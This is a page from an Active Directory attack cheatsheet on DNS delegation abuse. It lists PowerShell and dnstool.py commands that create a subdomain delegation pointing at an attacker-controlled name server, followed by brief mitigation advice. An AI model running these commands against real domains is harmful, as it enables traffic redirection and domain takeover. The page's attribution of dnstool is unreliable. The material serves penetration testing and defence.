Back to Active Directory

Dns Ad Delegation

Active Directory cheatsheet — Active Directory enumeration and attack techniques.

Overview

DNS AD Delegation attacks exploit DNS delegation permissions in Active Directory. Users with create/delete permissions on DNS zones can create subdomain delegations pointing to attacker-controlled DNS servers.

This enables domain takeover attacks by tricking the domain's DNS resolution to redirect traffic to attacker infrastructure.

Category: Active Directory — Active Directory enumeration and attack techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Dns Ad Delegation:

Get-DnsServerZone -ComputerName dc.domain.local
Add-DnsServerZoneDelegation -Name sub.domain.local -NameServer attacker.com -IPAddress 10.10.14.5
dnstool.py -u domain.local\user -p password --print-zones dc.domain.local
dnstool.py -u domain.local\user -p password --create-delegation dc.domain.local sub

Tools & Techniques

Recommended tools for Dns Ad Delegation:

  • dnstool: Python tool from KrbRelayUp for DNS manipulation
  • PowerShell DNS cmdlets: Get-DnsServerZone, Add-DnsServerZoneDelegation
  • Requires: DNS admin permissions or write access to DNS zone

Prevention & Mitigation

Security recommendations to prevent Dns Ad Delegation:

  • Restrict who has modify permissions on DNS zones
  • Audit DNS delegation changes regularly
  • Use secure DNS with DNSSEC where possible
  • Monitor for unauthorized DNS delegation modifications

References

Additional resources: